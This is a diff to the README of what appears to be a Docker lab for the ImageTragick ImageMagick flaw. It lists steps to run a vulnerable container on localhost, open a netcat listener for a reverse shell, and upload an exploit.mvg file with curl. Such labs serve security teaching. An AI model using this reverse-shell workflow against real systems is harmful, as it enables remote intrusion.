craighurley/docker-imagetragick/README.md

 ## Steps

-1. Build a docker image:

-        $ docker build -t imagetragick .

-2. Create a docker container:
+1. Download this image and create a container:

-        $ docker run -d --name imagetragick -p 127.0.0.1:8080:8080 imagetragick
+        $ docker run -d --name imagetragick -p 127.0.0.1:8080:8080 craighurley/docker-imagetragick

-3. Listen for the reverse shell:
+2. Listen for the reverse shell:

         $ nc -l -n -vvv -p 4443

-4. Edit the contents of `exploit.mvg` so that is uses the correct IP address that `nc` is listening on.
+3. Edit the contents of `exploit.mvg` so that it uses the correct IP address that `nc` is listening on.

-5. Upload exploit to vulnerable application:
+4. Upload exploit to vulnerable application:

         $ curl -v -F file=@exploit.mvg http://127.0.0.1:8080